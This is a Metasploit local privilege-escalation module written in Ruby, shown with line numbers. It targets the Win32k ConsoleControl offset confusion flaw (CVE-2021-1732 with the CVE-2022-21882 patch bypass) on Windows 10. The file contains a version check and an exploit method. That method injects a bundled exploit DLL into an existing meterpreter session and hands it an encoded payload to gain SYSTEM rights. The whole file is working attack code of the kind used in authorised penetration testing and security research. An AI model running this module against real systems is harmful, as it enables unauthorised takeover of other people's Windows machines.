Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = AverageRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Windows::Priv
11
  include Msf::Post::Windows::Process
12
  include Msf::Post::Windows::ReflectiveDLLInjection
13
  prepend Msf::Exploit::Remote::AutoCheck
14

15
  include Msf::Exploit::Deprecated
16
  moved_from 'exploit/windows/local/cve_2021_1732_win32k'
17

18
  def initialize(info = {})
19
    super(
20
      update_info(
21
        info,
22
        {
23
          'Name' => 'Win32k ConsoleControl Offset Confusion',
24
          'Description' => %q{
25
            A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
26
            NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
27
            treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
28
            achieve an out of bounds write operation, eventually leading to privilege escalation.
29

30
            This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
31
            In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
32
            is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
33
            function on a wider range of Windows 10 targets.
34
          },
35
          'License' => MSF_LICENSE,
36
          'Author' => [
37
            # CVE-2021-1732
38
            'BITTER APT', # exploit as used in the wild
39
            'JinQuan', # detailed analysis
40
            'MaDongZe', # detailed analysis
41
            'TuXiaoYi', # detailed analysis
42
            'LiHao', # detailed analysis
43
            # CVE-2022-21882
44
            'L4ys', # github poc
45
            # both CVEs
46
            'KaLendsi', # github pocs
47
            # Metasploit exploit
48
            'Spencer McIntyre' # metasploit module
49
          ],
50
          'Arch' => [ ARCH_X64 ],
51
          'Platform' => 'win',
52
          'SessionTypes' => [ 'meterpreter' ],
53
          'DefaultOptions' => {
54
            'EXITFUNC' => 'thread'
55
          },
56
          'Targets' => [
57
            [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
58
          ],
59
          'Payload' => {
60
            'DisableNops' => true
61
          },
62
          'References' => [
63
            # CVE-2021-1732 references
64
            [ 'CVE', '2021-1732' ],
65
            [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
66
            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
67
            [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
68
            [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
69
            # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
70
            [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
71
            [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
72
            [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
73
            [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
74
            # CVE-2022-21882 references
75
            [ 'CVE', '2022-21882' ],
76
            [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
77
            [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
78
          ],
79
          'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
80
          'DefaultTarget' => 0,
81
          'Notes' => {
82
            'Stability' => [ CRASH_OS_RESTARTS, ],
83
            'Reliability' => [ REPEATABLE_SESSION, ],
84
            'SideEffects' => []
85
          }
86
        }
87
      )
88
    )
89
  end
90

91
  def check
92
    if session.platform != 'windows'
93
      # Non-Windows systems are definitely not affected.
94
      return Exploit::CheckCode::Safe
95
    end
96

97
    version = get_version_info
98
    vprint_status("Windows Build Number = #{version.product_name}")
99
    if version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_21H2)
100
      CheckCode::Appears
101
    elsif version.build_number == Msf::WindowsVersion::Server2022 || version.build_number == Msf::WindowsVersion::Win11_21H2
102
      CheckCode::Detected("May be vulnerable, but exploit not tested on #{version.product_name}")
103
    else
104
      print_error('Vulnerability only present on Windows 10 versions 1803 - 21H2, Windows 11 21H2, Server 2019 and Server 2022')
105
      return CheckCode::Safe
106
    end
107
  end
108

109
  def exploit
110
    if is_system?
111
      fail_with(Failure::None, 'Session is already elevated')
112
    end
113

114
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
115
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
116
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
117
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
118
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
119
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
120
    end
121

122
    encoded_payload = payload.encoded
123
    execute_dll(
124
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
125
      [encoded_payload.length].pack('I<') + encoded_payload
126
    )
127

128
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
129
  end
130
end
131

132